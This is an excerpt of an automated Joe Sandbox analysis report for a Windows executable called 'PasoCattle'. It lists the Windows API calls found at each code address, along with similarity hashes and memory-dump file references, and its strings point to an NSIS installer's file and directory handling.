                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                          APIs
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                          • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                                                                          • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                          Strings
                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
